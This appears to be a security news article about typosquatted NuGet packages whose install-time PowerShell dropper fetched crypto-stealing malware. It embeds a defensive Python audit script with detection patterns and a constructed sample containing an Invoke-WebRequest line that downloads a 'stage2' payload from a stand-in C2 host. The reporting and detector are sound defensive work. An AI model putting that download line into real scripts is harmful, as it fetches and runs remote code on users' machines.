Rogue NuGet Packages Infect .NET Developers with Crypto-Stealing Malware


A new advanced and extremely harmful cyber attack is aimed at the NuGet repository with the goal of spreading malware that steals cryptocurrency among .NET developers.

The 13 unauthorized software bundles, which had been downloaded over 160000 times within the previous month, have now been removed.

Natan Nehorai and Brian Moussalli, researchers at JFrog, explained that when the packages were installed, a PowerShell script would activate and initiate the downloading of a payload. The payload, referred to as the 'second stage', could then be remotely executed.

Previously, there have been instances of security weaknesses found in NuGet packages, and they have been exploited to spread phishing links. However, this occurrence represents a significant development, as it is the first time that packages with harmful code have been detected.

The download count for three popular packages, Coinbase.Core, Anarchy.Wrapper.Net, and DiscordRichPresence.API, totaled 166000 downloads. However, it is possible that the number of downloads was artificially inflated by threat actors using bots to make the packages seem more authentic.

The persistent use of typosquatting is evident in the use of the Coinbase and Discord names: counterfeit packages are given names resembling authentic ones to deceive developers into downloading them.

The packages contain a dropper script. Its purpose is to run PowerShell code automatically, which then downloads another binary file from a hard-coded server.

To make things more confusing, certain packages opted to not include a harmful component directly. Instead, they obtained it as a dependency through another package that was intentionally rigged.

Furthermore, it is alarming that the link to the command-and-control (C2) server is established through HTTP instead of HTTPS, thereby making it susceptible to an attack by a malicious third party intercepting the communication (known as an adversary-in-the-middle or AiTM attack).
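An added example, not taken from JFrog's research or from the malware itself: a small Python audit that opens a `.nupkg` (a ZIP archive) and reports the three traits described above, namely a PowerShell script that downloads something, a plain-HTTP URL in that script, and a dependency on one of the packages named in this article. The regex heuristics, the sample package, its script path and the `.invalid` host are all constructed for illustration.

```python
import io
import re
import zipfile

# Package IDs named in the article; extend with your own deny list.
FLAGGED_IDS = {"coinbase.core", "anarchy.wrapper.net", "discordrichpresence.api"}
# Heuristic patterns chosen for this example, not taken from the real dropper.
DOWNLOAD = re.compile(r"Invoke-WebRequest|Start-BitsTransfer|DownloadFile|DownloadString", re.I)
PLAIN_HTTP = re.compile(r"http://[^\s'\"]+", re.I)
# Regex rather than an XML parser, because the .nuspec is untrusted input.
DEPENDENCY = re.compile(r"<dependency\b[^>]*?\bid\s*=\s*[\"']([^\"']+)", re.I)


def audit_nupkg(data: bytes) -> list[str]:
    """Return findings for one .nupkg (a ZIP archive) given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            lower = name.lower()
            if not lower.endswith((".ps1", ".psm1", ".nuspec")):
                continue
            text = pkg.read(name).decode("utf-8", errors="replace")
            if lower.endswith(".nuspec"):
                for dep in DEPENDENCY.findall(text):
                    if dep.lower() in FLAGGED_IDS:
                        findings.append(f"{name}: depends on flagged package {dep}")
                continue
            if DOWNLOAD.search(text):
                findings.append(f"{name}: PowerShell download call")
            for url in PLAIN_HTTP.findall(text):
                findings.append(f"{name}: plain-HTTP URL {url}")
    return findings


def build_sample() -> bytes:
    """Constructed sample package: inert text, reserved .invalid host."""
    nuspec = ('<package><metadata><id>Sample.Wrapper</id><dependencies>'
              '<dependency id="Coinbase.Core" version="1.0.0" />'
              '</dependencies></metadata></package>')
    script = "Invoke-WebRequest -Uri 'http://c2.example.invalid/stage2' -OutFile $t\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Sample.Wrapper.nuspec", nuspec)
        z.writestr("tools/init.ps1", script)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in audit_nupkg(build_sample()):
        print(finding)
```

A hit is a reason to read the script before the package reaches a build machine, not proof of malice; legitimate packages also ship PowerShell scripts.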

JFrog explains that the second-level malware is an exclusive payload which can be interchanged dynamically because it is downloaded from the C2 server.

The next stage provides various functions, such as a cryptocurrency stealer and a module that automatically checks with the command-and-control server for a new version of the malicious software.

As developers' systems can be compromised through the software supply chain, and backdoored code can be spread to downstream users undetected, this pathway has become a highly profitable target.

In a statement shared with The Hacker News, Shachar Menashe, Senior Director at JFrog Security Research, stated that this is evidence that no open source repository is safe from harmful individuals.

It is important for .NET developers who use NuGet to exercise caution when selecting open-source components for their builds, as there is a considerable risk of being infected by malicious code. This caution should be taken throughout the entire software development process to maintain secure software supply chain practices.
